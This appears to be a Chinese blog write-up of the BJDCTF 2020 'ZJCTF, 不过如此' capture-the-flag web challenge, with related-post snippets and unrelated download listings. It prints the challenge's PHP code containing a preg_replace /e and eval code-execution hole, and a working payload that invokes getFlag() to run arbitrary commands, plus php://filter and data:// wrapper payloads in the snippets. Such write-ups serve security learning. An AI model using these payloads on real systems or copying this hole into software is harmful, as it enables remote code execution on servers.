【BJDCTF 2020】ZJCTF,不过如此

最新推荐文章于 2025-09-03 14:30:00 发布
原创 最新推荐文章于 2025-09-03 14:30:00 发布 · 307 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #NSSCTF #BJDCTF

主要是第二关挺有意思的,

题目

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

思路

以下是 payload 的执行过程:

以下是 payload 的执行过程:

  1. 构造请求:

  • 攻击者发送请求:http://example.com/?id=1&?\S*=${getFlag()}&&cmd=phpinfo();

  • $_GET 数组包含以下内容:

    $_GET = [
'id' => '1',
'?\S*' => '${getFlag()}',
'cmd' => 'phpinfo();'
];

  1. 进入 foreach 循环:

  • 第一次循环:

    • $re = 'id'$str = '1',不会触发任何问题。

  • 第二次循环:

    • $re = '?\S*'$str = '${getFlag()}'

    • 调用 complex($re, $str),即:

    preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str);

    • 此时 $re?\S*$str${getFlag()}

    • preg_replace 解析 ${getFlag()} 并执行 getFlag() 函数。

  • 执行 getFlag 函数:

  • getFlag 函数通过 @eval($_GET['cmd']) 执行 phpinfo();

  • 输出 PHP 环境信息。

EXP

?\S*=${getFlag()}&&cmd=phpinfo();

XiaoHei_Q
关注
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2673
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
BJDCTF2020 ZJCTF不过如此 1
hddi1的博客
01-05 1030
php伪协议 #利用伪协议 #filegetcomtent用phpinput绕过 #PHP对于函数调用的语法问题。
BUUCTF-ZJCTF不过如此
m0_47571887的博客
11-29 2597
打开题目,代码审计的题,审计一下代码,我们提交text函数,并且打开后的内容要与I have a dream一致,才能执行file函数 看到有一个next.php,自然想到用php伪协议读取他 payload:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 解码审计一下 <?php $id = $_GET['id'..
[BJDCTF2020]ZJCTF不过如此
积累只要,在专与勤
09-03 1142
php正则表达式 --元字符/特殊字符
[BJDCTF2020]ZJCTF不过如此1
m0_73673698的博客
06-17 1834
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
BUUCTF[BJDCTF2020]ZJCTF,不过如此
LSYZWF的博客
10-12 532
文章目录题目解答知识点 题目 链接:https://buuoj.cn/challenges#[BJDCTF2020]ZJCTF%EF%BC%8C%E4%B8%8D%E8%BF%87%E5%A6%82%E6%AD%A4 解答 1、审计代码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I h
BUUCTF [BJDCTF2020] ZJCTF不过如此
Senimo
12-10 692
BUUCTF [BJDCTF2020] ZJCTF不过如此 考点: php伪协议读取源码 函数preg_replace()在\e模式下,存在代码执行漏洞 对于传入的非法的$_GET数组参数名,会将其转换成下划线_ 启动环境,给出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 309
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
CTF-Web习题:[BJDCTF2020]ZJCTF不过如此
LJW123487的博客
07-18 681
本题涉及PHP文件包含漏洞以及伪协议等知识点
[BJDCTF2020]ZJCTF不过如此 1
qq_43618536的博客
07-04 857
BUUCTF的[BJDCTF2020]ZJCTF不过如此 1
buuctf-[BJDCTF2020]ZJCTF不过如此(小宇特详解)
小宇的web博客
02-12 1743
buuctf-[BJDCTF2020]ZJCTF不过如此(小宇特详解) 打开题目: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')
BUUCTF---web---[BJDCTF2020]ZJCTF不过如此
2201_75556700的博客
05-25 901
的函数,用于对字符串进行正则替换操作。具体来说,它会将匹配到的字符串转换为小写。传入一个参数text,里面的内容要包括I have a dream。在文件包含那一行,我们看到了next.php的提示,我们尝试读取文件。定义了一个getFlag函数,将参数cmd中的参数输出。/ei:当作php代码来执行,忽略大小写。5、由此我们可以构造新payload。根据代码:我们构造payload。1、点开连接,页面出现了提示。),然后将其赋值给一个变量。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8862
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网球比赛YOLO视觉分析.zip
01-07
网球比赛YOLO视觉分析.zip
【顶级EI完美复现】电力系统碳排放流的计算方法【IEEE 14节点】(Matlab代码实现)
01-07
【顶级EI完美复现】电力系统碳排放流的计算方法【IEEE 14节点】(Matlab代码实现)内容概要:本文介绍了基于IEEE 14节点电力系统的碳排放流计算方法,并提供了Matlab代码实现,属于顶级EI期刊级别的研究成果复现。该方法通过建立电力系统中各节点的碳排放流动模型,结合潮流计算与电源出力特性,量化不同机组和线路的碳排放责任,进而实现对电力系统低碳运行的评估与优化。文中详细阐述了算法原理、数学模型构建及仿真步骤,适用于电力系统低碳化分析与碳足迹追踪研究。; 适合人群:具备电力系统基础知识和Matlab编程能力的高校研究生、科研人员及从事能源系统低碳化研究的专业技术人员,尤其适合致力于高水平论文复现与算法开发的研究者。; 使用场景及目标:①用于电力系统碳排放流的精确建模与可视化分析;②支撑“双碳”背景下电网低碳调度、绿色电力溯源与碳配额分配等应用场景;③为撰写高水平学术论文(如EI/SCI)提供可复现的技术路径与代码基础。; 阅读建议:建议读者结合IEEE 14节点系统标准数据,逐步运行并调试所提供的Matlab代码,深入理解碳流分配逻辑与矩阵运算实现方式,同时可拓展至其他节点系统以验证算法通用性。
Android多线程下载
01-07
源码地址: https://pan.quark.cn/s/dcbecb73e50d M3U8-Downloader-Build Release Download M3U8-Downloader 直接下载 M3U8-Downloader是基于Electron框架开发的一款可以下载、播放HLS视频流的APP,功能特点如下: 流程原理图 -- -- 官网 M3U8-Downloader 官网 QQ交流群:341972319 点我加QQ交流群 获取M3U8视频地址 在chrome浏览器打开视频网页,按下F12,页签点击到Network页面,在Filter框里输入"m3u8",然后按F5刷新页面,如果网页里的视频使用的是HLS源,就可以在这里捕获到视频流地址,然后选中右键 Copy -> Copy Link Address. 提供m3u8源地址,下载并无损转码Mp4文件 自定义头添加-视频教程 下载可执行包 [推荐] 蓝奏下载 Windows 、Linux、MacOS 下载 下载 Releases下载 运行源码 NodeJS开发环境搭建 安装NodeJs最新版,NodeJs Download Clone 代码 在任意文件夹下新建一个文件夹存放代码,并执行以下命令 Yarn 环境安装 Package 依赖安装 运行M3U8-Downloader 打包发布 Enjoy it 赞赏 赞赏链接
基于STM32 F4的永磁同步电机无位置传感器控制策略研究
最新发布
01-07
基于STM32 F4的永磁同步电机无位置传感器控制策略研究内容概要:本文围绕基于STM32 F4的永磁同步电机(PMSM)无位置传感器控制策略展开研究,重点探讨在不依赖物理位置传感器的情况下,如何通过算法实现对电机转子位置和速度的精确估计与控制。文中结合嵌入式开发平台STM32 F4,采用如滑模观测器、扩展卡尔曼滤波或高频注入法等先进观测技术,实现对电机反电动势或磁链的估算,进而完成无传感器矢量控制(FOC)。同时,研究涵盖系统建模、控制算法设计、仿真验证(可能使用Simulink)以及在STM32硬件平台上的代码实现与调试,旨在提高电机控制系统的可靠性、降低成本并增强环境适应性。; 适合人群:具备一定电力电子、自动控制理论基础和嵌入式开发经验的电气工程、自动化及相关专业的研究生、科研人员及从事电机驱动开发的工程师。; 使用场景及目标:①掌握永磁同步电机无位置传感器控制的核心原理与实现方法;②学习如何在STM32平台上进行电机控制算法的移植与优化;③为开发高性能、低成本的电机驱动系统提供技术参考与实践指导。; 阅读建议:建议读者结合文中提到的控制理论、仿真模型与实际代码实现进行系统学习,有条件者应在实验平台上进行验证,重点关注观测器设计、参数整定及系统稳定性分析等关键环节。
QSPI协议解析包(基于PulseView软件使用)
01-07
1. 在PulseView软件中,可用于解析QSPI协议 2. 当前作者只验证过QSPI的4线写指令、单线读指令,其他指令暂未验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值